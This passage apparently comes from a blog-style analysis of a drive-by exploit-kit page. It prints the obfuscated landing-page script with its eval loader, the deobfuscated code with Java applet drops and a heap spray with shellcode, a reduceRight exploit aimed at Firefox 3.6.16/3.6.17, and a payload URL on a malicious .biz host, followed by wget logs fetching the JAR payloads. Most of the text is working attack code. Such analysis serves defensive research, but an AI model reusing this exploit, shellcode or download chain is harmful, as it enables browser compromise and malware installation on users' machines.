_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_f_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_5_494_2_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_5_494_4_494_d_494_2_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_a_494_b_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_4_494_c_494_5_494_8_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_0_494_c_494_c_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_b_494_7_494_7_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_2_494_5_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_2_494_3_494_c_494_b_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_6_494_6_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_1_494_b_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_4_494_0_494_1_494_5_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_9_494_e_494_8_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_1_494_3_494_2_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_6_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_6_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_2_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_7_494_8_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_5_494_0_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_c_494_7_494_2_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_f_494_6_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_2_494_e_494_6_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_c_494_6_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_f_494_f_494_6_494_c_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_4_494_6_494_8_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_0_494_7_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_2_494_f_494_3_494_a_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_6_494_2_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_d_494_6_494_1_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_c_494_6_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_4_494_7_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_1_494_6_494_5_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_9_494_7_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_9_494_6_494_5_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_2_494_2_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_a_494_6_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_5_494_2_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_c_494_7_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_1_494_6_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_3_494_6_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_0_494_2_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_0_494_6_494_8_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_c_494_3_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_e_494_6_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_3_494_6_494_b_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_2_494_3_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_7_494_3_494_5_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_6_494_2_494_6_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_f_494_7_494_2_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_4_494_6_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_1_494_3_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_2_494_6_494_3_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_6_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_1_494_7_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_6_494_3_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_9_494_3_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_9_494_2_494_6_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_0_494_6_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_7_494_2_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_3_494_7_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_d_494_7_494_5_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_1_494_3_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_6_494_3_494_2_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_2_494_6_494_3_494_1_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_1_494_7_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_6_494_c_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_d_494_7_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_8_494_3_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_2_494_2_494_6_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_f_494_6_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_d_494_7_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_2_494_3_494_2_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_2_494_6_494_3_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_1_494_6_494_7_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_6_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_4_494_3_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_2_494_6_494_3_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_c_494_6_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_3_494_6_494_9_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_d_494_6_494_b_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_7_494_3_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_3_494_2_494_6_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_9_494_6_494_b_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_d_494_6_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_3_494_3_494_1_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_5_494_"_494_)_494_ _494_+_494_ _494_u_494_n_494_e_494_s_494_c_494_a_494_p_494_e_494_(_494_m_494_y_494_e_494_s_494_c_494_a_494_p_494_e_494_(_494_G_494_e_494_t_494_U_494_r_494_l_494_(_494_)_494_)_494_)_494_;_494_v_494_a_494_r_494_ _494_p_494_a_494_y_494_l_494_o_494_a_494_d_494_ _494_=_494_ _494_u_494_n_494_e_494_s_494_c_494_a_494_p_494_e_494_(_494_"_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_c_494_6_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_0_494_6_494_c_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_4_494_5_494_4_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_4_494_5_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_4_494_a_494_4_494_5_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_5_494_5_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_1_494_6_494_b_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_5_494_6_494_1_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_5_494_2_494_6_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_7_494_5_494_7_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_8_494_0_494_6_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_1_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_8_494_2_494_8_494_c_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_8_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_d_494_7_494_b_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_3_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_8_494_0_494_0_494_2_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_2_494_d_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_8_494_7_494_6_494_b_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_0_494_3_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_0_494_0_494_1_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_0_494_4_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_0_494_0_494_1_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_0_494_0_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_6_494_9_494_1_494_7_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_4_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_0_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_0_494_0_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_c_494_0_494_0_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_2_494_a_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_0_494_4_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_0_494_0_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_0_494_0_494_5_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_2_494_e_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_c_494_0_494_0_494_1_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_2_494_a_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_8_494_0_494_6_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_1_494_f_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_9_494_0_494_9_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_9_494_0_494_9_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_3_494_4_494_0_494_1_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_1_494_0_494_2_494_b_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_9_494_0_494_9_494_0_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_9_494_0_494_9_494_0_494_"_494_)_494_ _494_+_494_ _494_s_494_c_494_o_494_d_494_e_494_;_494_v_494_a_494_r_494_ _494_t_494_r_494___494_p_494_a_494_d_494_d_494_i_494_n_494_g_494_ _494_=_494_ _494_u_494_n_494_e_494_s_494_c_494_a_494_p_494_e_494_(_494_"_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_c_494_0_494_c_494___494___494_L_494_E_494_n_494_0_494___494___494_u_494_0_494_c_494_0_494_c_494_"_494_)_494_;_494_w_494_h_494_i_494_l_494_e_494_ _494_(_494_t_494_r_494___494_p_494_a_494_d_494_d_494_i_494_n_494_g_494_._494_l_494_e_494_n_494_g_494_t_494_h_494_ _494___494___494_d_494_E_494_n_494_3_494___494___494_ _494_0_494_x_494_7_494_f_494_a_494_0_494_0_494_)_494_ _494_{_494_t_494_r_494___494_p_494_a_494_d_494_d_494_i_494_n_494_g_494_ _494_+_494_=_494_ _494_t_494_r_494___494_p_494_a_494_d_494_d_494_i_494_n_494_g_494_;_494_}_494_v_494_a_494_r_494_ _494_d_494_u_494_m_494_m_494_y_494_ _494_=_494_ _494_p_494_t_494_r_494_s_494_ _494_+_494_ _494_p_494_a_494_y_494_l_494_o_494_a_494_d_494_ _494_+_494_ _494_t_494_r_494___494_p_494_a_494_d_494_d_494_i_494_n_494_g_494_;_494_v_494_a_494_r_494_ _494_h_494_s_494_p_494_r_494_a_494_y_494_ _494_=_494_ _494_d_494_u_494_m_494_m_494_y_494_._494_s_494_u_494_b_494_s_494_t_494_r_494_i_494_n_494_g_494_(_494_0_494_,_494_0_494_x_494_7_494_f_494_a_494_0_494_0_494_ _494_-_494_ _494_b_494_h_494_e_494_a_494_d_494_e_494_r_494_ _494_-_494_ _494_n_494_u_494_l_494_l_494_t_494_)_494_;_494_H_494_e_494_a_494_p_494_B_494_l_494_o_494_c_494_k_494_s_494_ _494_=_494_ _494_n_494_e_494_w_494_ _494_A_494_r_494_r_494_a_494_y_494_(_494_)_494_;_494_f_494_o_494_r_494_ _494_(_494_i_494_=_494_0_494_;_494_i_494___494___494_d_494_E_494_n_494_3_494___494___494_0_494_x_494_1_494_0_494_0_494_;_494_i_494_+_494_+_494_)_494_{_494_H_494_e_494_a_494_p_494_B_494_l_494_o_494_c_494_k_494_s_494_[_494_i_494_]_494_ _494_+_494_=_494_ _494_h_494_s_494_p_494_r_494_a_494_y_494_;_494_}_494_}_494_;_494_f_494_u_494_n_494_c_494_t_494_i_494_o_494_n_494_ _494_s_494_t_494_a_494_r_494_t_494_e_494_(_494_)_494_ _494_{_494_ _494_ _494_ _494_s_494_p_494_r_494_a_494_y_494_(_494_)_494_;_494_o_494_b_494_j_494_ _494_=_494_ _494_n_494_e_494_w_494_ _494_A_494_r_494_r_494_a_494_y_494_(_494_)_494_;_494_o_494_b_494_j_494_._494_l_494_e_494_n_494_g_494_t_494_h_494_ _494_=_494_ _494_2_494_1_494_9_494_7_494_8_494_1_494_5_494_3_494_0_494_2_494_;_494_f_494_ _494_=_494_ _494_f_494_u_494_n_494_c_494_t_494_i_494_o_494_n_494_ _494_t_494_r_494_i_494_g_494_g_494_e_494_r_494_(_494_p_494_r_494_e_494_v_494_,_494_ _494_m_494_y_494_o_494_b_494_j_494_,_494_ _494_i_494_n_494_d_494_x_494_,_494_ _494_a_494_r_494_r_494_a_494_y_494_)_494_ _494_{_494_a_494_l_494_e_494_r_494_t_494_(_494_m_494_y_494_o_494_b_494_j_494_[_494_0_494_]_494_)_494_;_494_}_494_;_494_o_494_b_494_j_494_._494_r_494_e_494_d_494_u_494_c_494_e_494_R_494_i_494_g_494_h_494_t_494_(_494_f_494_,_494_1_494_,_494_2_494_,_494_3_494_)_494_;_494_}_494_i_494_f_494_ _494_(_494_(_494_n_494_a_494_v_494_i_494_g_494_a_494_t_494_o_494_r_494_._494_u_494_s_494_e_494_r_494_A_494_g_494_e_494_n_494_t_494_._494_i_494_n_494_d_494_e_494_x_494_O_494_f_494_(_494_"_494_F_494_i_494_r_494_e_494_f_494_o_494_x_494_/_494_3_494_._494_6_494_._494_1_494_6_494_"_494_)_494_ _494_!_494_=_494_ _494_-_494_1_494_)_494_ _494_|_494_|_494_ _494_(_494_n_494_a_494_v_494_i_494_g_494_a_494_t_494_o_494_r_494_._494_u_494_s_494_e_494_r_494_A_494_g_494_e_494_n_494_t_494_._494_i_494_n_494_d_494_e_494_x_494_O_494_f_494_(_494_"_494_F_494_i_494_r_494_e_494_f_494_o_494_x_494_/_494_3_494_._494_6_494_._494_1_494_7_494_"_494_)_494_ _494_!_494_=_494_ _494_-_494_1_494_)_494_)_494_ _494_{_494_ _494_ _494_s_494_t_494_a_494_r_494_t_494_e_494_(_494_)_494_ _494_;_494_}_494_</fieldset>
<script language="javascript">function pEsKGFGdbf(x, ararg){ChPxWOFrXm= 0 ;    var aystf = pEsKGFGdbf ;  var d = 0;  kj = String(parseInt);  if(isNaN(kj.match(/arseI/))) {  var dsadsttrtr = ararg[0];   if(isNaN(kj.match(/arseI/))) {   d= x[dsadsttrtr.join("").replace(/kh/, "e")]("AFegplAupm")["inQCDtCrtWvpnerHQCDtCrtWvpTML".replace(/QCDtCrtWvp/, "")] ;};   };   return d;}function getObjectClass(obj){   if (typeof obj != ("obj"+"ect") || obj === null) {return false;}   else {return typeof obj;};}; QCDtCrtWvp = 0;  Array.prototype.kkkkljhgjhgjhgytrfdsfds=function(kk, ff, loo) { return loo.join(""); };  navigator.llllmnmnmnasvb=function(b) { var m = 554*b; return this;};  String.prototype.replace = (function(r){ return function(find, replace, replaceOnce) {     if(typeof find == "string" && !replaceOnce) {       find = r.apply(find, [/[\[\]^$*+.?(){}\-]//g,function(c) { return "\\"+c; }]);       find = new RegExp(find, "g");     } else if(typeof find == "object" && !replaceOnce && !find.global) {       find = new RegExp(find.source, "g");     }     return r.apply(this, [find,replace]); }})(String.prototype.replace);  document.llllmnmnmnasvb=function(b) { var m = (919*b - b ); return this;};  try {    screen.sldkdkjkkkkkjlskdi("GBhkDpHxt");  } catch (vAnsSobHFcOTNqg) {    m = navigator;  if (getObjectClass(m.llllmnmnmnasvb(808)) == "object") {    RtsVeIodKO = pEsKGFGdbf(document["llllmnmnmnasvb"](897), [["get","E","l","kh","mentById"]]) ;    zHRtocNBGS = RtsVeIodKO.length ;   XjbpvEBiDp = "" ;   XjbpvEBiDp = RtsVeIodKO.replace(/_494_/,"") ;  XjbpvEBiDp=XjbpvEBiDp.replace(/__dEn3__/,"<") ;XjbpvEBiDp=XjbpvEBiDp.replace(/__FEn8__/,">") ;XjbpvEBiDp=XjbpvEBiDp.replace(/__jEn7__/,"&") ;XjbpvEBiDp=XjbpvEBiDp.replace(/__LEn0__/,"%") ;  li9i=window;  var varval = ["r","e","v","a","l","l","m", "4"].slice(1,6);  li9i[varval.kkkkljhgjhgjhgytrfdsfds("34534534", "erkljgewituweituweriuwer",varval).substr(0,4)](XjbpvEBiDp) ;};};  </script>
</body>
</html>

2. Obfuscated JavaScript of course. 

Excellent obfuscation: function IsPlug.... very hard to spot...
I Bet Wepawet handles this perfectly: Wepawet link

unction IsPlug(){
  var PlugName = "";
  var res = 0;
  try {
    if (navigator.plugins && navigator.mimeTypes.length){
      for (var i = 0; i < navigator.plugins.length; i ++ ){
        jf = navigator.plugins[i].name.match(/Adobe Acrobat/);
        if (!jf){
          jf = navigator.plugins[i].name.match(/Adobe PDF/);
        }
        ;
        if (jf){
          res = 1;
          break ;
        }
        ;
      }
      ;
    }
    ;
  }
  catch (e){
  }
  ;
  return res;
}
;
document.write("
<applet  archive=\"NWHrh\"  code=\"oVv.class\"  width=\"10\" height=\"18\"><param value=\"
103sdj115sdj115sdj111sdj57sdj46sdj46sdj101sdj96sdj108sdj104sdj107sdj120sdj115sdj100sdj96sd
j111sdj104sdj100sdj56sdj45sdj97sdj104sdj121sdj46sdj116sdj111sdj107sdj110sdj96sdj99sdj114sd
j45sdj111sdj103sdj111sdj62sdj107sdj104sdj109sdj106sdj114sdj60sdj49sdj52sdj54sdj37sdj101sdj
113sdj110sdj109sdj115sdj60sdj48sdj50sdj37sdj108sdj100sdj115sdj96sdj60sdj53sdj51sdj56sdj37s
dj104sdj108sdj111sdj113sdj100sdj114sdj114sdj116sdj108sdj60sdj48sdj49sdj53sdj48sdj37sdj114s
dj96sdj107sdj100sdj114sdj60sdj51sdj55sdj37sdj97sdj104sdj110sdj114sdj60sdj49sdj49sdj56sdj37
sdj102sdj96sdj108sdj100sdj60sdj51sdj56sdj37sdj98sdj107sdj104sdj98sdj106sdj60sdj50sdj54sdj3
7sdj114sdj106sdj104sdj109sdj60sdj48sdj50sdj52\" name=\"EOHPifL\" ><param value=\"71sdj82sd
j106sdj67sdj53sdj112sdj113sdj45sdj100sdj119sdj100\" name=\"XvrfNMu\" ><param value=\"108sd
j96sdj115sdj103\" name=\"AdbmXfUGgx\" ></applet>");
document.write("
<applet  archive=\"lnMFTpPw\" code=\"IPR.class\"  width=\"10\"  height=\"18\"><param  valu
e=\"103sdj115sdj115sdj111sdj57sdj46sdj46sdj101sdj96sdj108sdj104sdj107sdj120sdj115sdj100sdj
96sdj111sdj104sdj100sdj56sdj45sdj97sdj104sdj121sdj46sdj116sdj111sdj107sdj110sdj96sdj99sdj1
14sdj45sdj111sdj103sdj111sdj62sdj107sdj104sdj109sdj106sdj114sdj60sdj49sdj52sdj54sdj37sdj10
1sdj113sdj110sdj109sdj115sdj60sdj48sdj50sdj37sdj108sdj100sdj115sdj96sdj60sdj53sdj51sdj56sd
j37sdj104sdj108sdj111sdj113sdj100sdj114sdj114sdj116sdj108sdj60sdj48sdj49sdj53sdj48sdj37sdj
114sdj96sdj107sdj100sdj114sdj60sdj51sdj55sdj37sdj97sdj104sdj110sdj114sdj60sdj49sdj49sdj56s
dj37sdj102sdj96sdj108sdj100sdj60sdj51sdj56sdj37sdj98sdj107sdj104sdj98sdj106sdj60sdj50sdj54
sdj37sdj114sdj106sdj104sdj109sdj60sdj48sdj50sdj52\"  name=\"sSpwknEHBp\" ><param  value=\"
71sdj82sdj106sdj67sdj53sdj112sdj113sdj45sdj100sdj119sdj100\"  name=\"TvSRUWW\" ><param  va
lue=\"108sdj96sdj115sdj103\"  name=\"SyLIfT\" ></applet>");
document.write("<object id=\"d\"><object>");
if (IsPlug() == 1){
}
var myobject = document.getElementById('d');
function GetUrl(){
  return "
http://familyteapie9.biz/uploads.php?links=257&front=13&meta=649&impressum=1261&sales=48&b
ios=229&game=49&click=37&skin=135";
}
;
function myescape(input){
  var output = '';
  ff = 255;
  f = 0;
  if (input.length % 2){
    f = 1;
  }
  for (var i = 0; i < input.length; i += 2){
    output += '%u';
    if (i == (input.length - 1)){
      output += 'ff';
    }
    else {
      output = output + input.charCodeAt(i + 1).toString(16);
    }
    output += input.charCodeAt(i).toString(16);
  }
  if (!f){
    output = output + '%uffff';
  }
  return output;
}
;
function spray(){
  var ptrs = unescape("
%u0000%u0048%u0c00%u5864%u704e%u5349%u587a%u4157%u6844%u564a%u5143%u4359%u7674%u666c%u6a71
%u5174%u4a69%u414e%u4166%u0000%u26f0%u104c%u5846%u426e%u0000%u240c%u3410%u007c%u0c00%u5326
%u1005%u6379%u624a%u7959%u694f%u4663%u4445%u4261%u574b%u6666%u4d71%u7148%u4153%u4b47%u4244
%u6f72%u5942%u655a%u784e%u4a66%u6a68%u4c67%u7879%u002e%u0c00");
  var bheader = 0x12 / 2;
  var nullt = 0x2 / 2;
  var scode = unescape("
%u60eb%u335f%u99c0%u5048%u6a40%ub201%u5745%uf78b%u23b2%udf8b%uda03%u46b2%uda03%ub253%u030a
%u8bda%uaafb%u8b5b%u50fe%u5750%u45b2%ufa03%ub2aa%u0323%ub2fa%u030b%u80fa%u003f%u0175%u5747
%u5050%ub057%u66ff%uffb9%uf2ff%u4fae%u07c6%u5f00%u8b58%ub2fe%u0346%u53fa%uc68b%u5e05%u0000
%u5000%u5656%u466a%u02eb%u79eb%u6a57%u5930%u8b64%u8b01%u0c40%u688b%u8b1c%u085d%u6d8b%u5500
%u438b%u8b3c%u1844%u0b78%u74c0%u8d31%u1874%uad18%uad91%uc303%uad50%u3c8d%uad03%u2c8d%u8b03
%u8f74%u03fc%u33f3%u33c0%u99d2%u03ac%uc1d0%u05c2%u7948%u8bf7%u2474%u3b08%u7416%ue206%u58e2
%ueb5d%u58ba%ub70f%u4d54%u03fe%u901c%u5f5d%ud3ff%uebab%u579d%u7c8b%u0824%u6650%uffb8%uf200
%u4fae%uc033%u0788%u5f58%u04c2%ue800%uff20%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%u1529%u54d2
%ufabd%u4c58%u70cc%u6b77%uf259%u23cb%u6664%u11b4%u4015%u9e84%u3132%u6564%u6563%u652e%u6578
%u7500%u6c72%u6f6d%u2e6e%u6c64%uff6c%u7468%u7074%u2f3a%u662f%u6d61%u6c69%u7479%u6165%u6970
%u3965%u622e%u7a69%u752f%u6c70%u616f%u7364%u702e%u7068%u6c3f%u6e69%u736b%u323d%u3735%u6626
%u6f72%u746e%u313d%u2633%u656d%u6174%u363d%u3934%u6926%u706d%u6572%u7373%u6d75%u313d%u3632
%u2631%u6173%u656c%u3d73%u3834%u6226%u6f69%u3d73%u3232%u2639%u6167%u656d%u343d%u2639%u6c63
%u6369%u3d6b%u3733%u7326%u696b%u3d6e%u3331%u35") + unescape(myescape(GetUrl()));
  var payload = unescape("
%u6c6e%u706c%u454d%u7453%u4a45%u7554%u616b%u6561%u526f%u7573%u1806%u101f%u828c%u1083%u0d7b
%u103e%u8002%u102d%u876b%u1003%u0001%u1004%u0001%u0000%u6917%u104e%u1000%u0000%uc000%u102a
%u0040%u0000%u0005%u102e%uc001%u102a%u1806%u101f%u9090%u9090%u3401%u102b%u9090%u9090") + 
  scode;
  var tr_padding = unescape("%u0c0c%u0c0c");
  while (tr_padding.length < 0x7fa00){
    tr_padding += tr_padding;
  }
  var dummy = ptrs + payload + tr_padding;
  var hspray = dummy.substring(0, 0x7fa00 - bheader - nullt);
  HeapBlocks = new Array();
  for (i = 0; i < 0x100; i ++ ){
    HeapBlocks[i] += hspray;
  }
}
;
function starte(){
  spray();
  obj = new Array();
  obj.length = 2197815302;
  f = function trigger(prev, myobj, indx, array){
    alert(myobj[0]);
  }
  ;
  obj.reduceRight(f, 1, 2, 3);
}
if ((navigator.userAgent.indexOf("Firefox/3.6.16") !=  - 1) || (navigator.userAgent.
indexOf("Firefox/3.6.17") !=  - 1)){
  starte();
}

Wepawet saves the day and we can see that we should be handed a couple of applets and some shellcode

3. Lets get the Jars


--2013-03-23--  hxxp: //familyteapie1.biz/mail/wap/NWHrh
Resolving familyteapie1.biz... 5.199.171.217
Connecting to familyteapie1.biz|5.199.171.217|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Date: Sat, 23 Mar 2013 15:58:38 GMT GMT
  Pragma: no-cache
  Server: Apache/2.2.22 (Win32) PHP/5.2.17
  Content-Length: 43773
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-java-archive
Length: 43773 (43K) [application/x-java-archive]
Saving to: `NWHrh.jar'

     0K .......... .......... .......... .......... ..        100%  217K=0.2s

2013-03-23 (217 KB/s) - `NWHrh.jar' saved [43773/43773]

--2013-03-23--  hxxp: //familyteapie1.biz/mail/wap/lnMFTpPw
Resolving familyteapie1.biz... 5.199.171.217
Connecting to familyteapie1.biz|5.199.171.217|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Pragma: no-cache
  Server: Apache/2.2.22 (Win32) PHP/5.2.17
